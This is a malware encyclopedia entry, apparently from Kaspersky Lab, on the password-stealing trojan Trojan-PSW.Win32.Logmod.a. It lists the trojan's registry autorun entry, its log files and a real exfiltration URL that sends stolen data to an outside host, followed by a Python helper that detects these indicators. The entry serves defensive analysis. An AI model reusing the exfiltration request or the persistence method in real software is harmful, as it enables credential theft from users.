
Trojan-PSW.Win32.Logmod.a

Aliases
Trojan-PSW.Win32.Logmod.a (Kaspersky Lab) is also known as: Trojan.PSW.Logmod.a (Kaspersky Lab), PWS-Logmod (McAfee), PWSteal.Trojan (Symantec), Trojan.PWS.Logmod (Doctor Web), Troj/PWSMod-A (Sophos), PWS:Win32/Logmod (RAV), TROJ_LOGMOD.A (Trend Micro), Win32:Trojan-gen. (ALWIL), Trojan.Sysres.B (SOFTWIN), Trj/Sysres (Panda), Win32/PSW.Logmod (Eset)
Description added Aug 16 2002
Behavior PSW Trojan
Technical details

The Logmod program belongs to the family of password stealing trojans.

Logmod steals the following information: Windows version, Explorer version, phone book entries, service provider information, RAS data, modem log, etc.

When run, the trojan installs itself into the system. During installation, Logmod registers itself in the auto-run section of the system registry:

 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
  Sysres = Sysres.exe

The trojan does not copy or move its file to any other directory, so it cannot run automatically on Windows boot-up unless it was originally placed in the Windows or Windows system directory. For example, it cannot "install" itself into the system when run from an email attachment. There should be an additional component (a "dropper") that installs the trojan into the system.

To send stolen data out of infected computers, Logmod opens an Internet URL with the following request:

http://stats.internetsexprovider.com/resident/SysWeb.php3?country=espana4&Login=%data%

'%data%' contains strings with stolen information that are sent to that URL. Apparently the SysWeb.php at that site gets %data% upon request and passes it to the trojan "master".

Miscellaneous
Logmod creates additional files in the Windows directory:

 SysTrace.daf, CallTrace.daf, DialTrace.daf

These files contain data that is logged/stolen.

The Logmod trojan also creates the following additional registry key for its internal use:


 HKLM\Software\DIALPASS
   DateEspana4
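
The indicators described above can be checked together. The following is an added example, not part of the original description: a triage helper that matches a host snapshot and proxy-log URLs against them. The snapshot layout (dict of Run values, list of file names in the Windows and system directories, list of HKLM key paths) and the function names are assumptions; the sample data is constructed.

```python
import ntpath
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the description above.
RUN_VALUE = ("sysres", "sysres.exe")
TRACE_FILES = {"systrace.daf", "calltrace.daf", "dialtrace.daf"}
INTERNAL_KEY = r"software\dialpass"
C2_HOST = "stats.internetsexprovider.com"
C2_PATH = "/resident/sysweb.php3"

def check_host(run_values, windows_dir_files, hklm_keys):
    """Return findings for one host snapshot (hypothetical layout, plain Python data)."""
    findings = []
    files = {f.lower() for f in windows_dir_files}
    for name, data in run_values.items():
        if (name.lower(), ntpath.basename(data.strip('"')).lower()) == RUN_VALUE:
            # The Run value carries no path, so it only starts at boot when the
            # file sits in the Windows or Windows system directory.
            state = "active" if "sysres.exe" in files else "dormant (file not in Windows dir)"
            findings.append(f"Run value Sysres -> {data}: {state}")
    for f in sorted(files & TRACE_FILES):
        findings.append(f"log file present: {f}")
    if any(k.lower().rstrip("\\") == INTERNAL_KEY for k in hklm_keys):
        findings.append(r"registry key present: HKLM\Software\DIALPASS")
    return findings

def check_url(url):
    """True if a proxy-log URL matches the request Logmod uses to send data out."""
    parts = urlsplit(url)
    if (parts.hostname or "").lower() != C2_HOST:
        return False
    if parts.path.lower() != C2_PATH:
        return False
    return "Login" in parse_qs(parts.query, keep_blank_values=True)

# Constructed sample snapshot and proxy-log URLs (not real telemetry).
SAMPLE_RUN = {"Sysres": "Sysres.exe"}
SAMPLE_FILES = ["notepad.exe", "SysTrace.daf"]
SAMPLE_KEYS = [r"Software\Microsoft", r"Software\DIALPASS"]
SAMPLE_URLS = [
    "http://stats.internetsexprovider.com/resident/SysWeb.php3?country=espana4&Login=abc",
    "http://www.example.com/index.html",
]

if __name__ == "__main__":
    for line in check_host(SAMPLE_RUN, SAMPLE_FILES, SAMPLE_KEYS):
        print(line)
    print([u for u in SAMPLE_URLS if check_url(u)])
```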
 

Copyright © 1996 - 2010
Kaspersky Lab
All rights reserved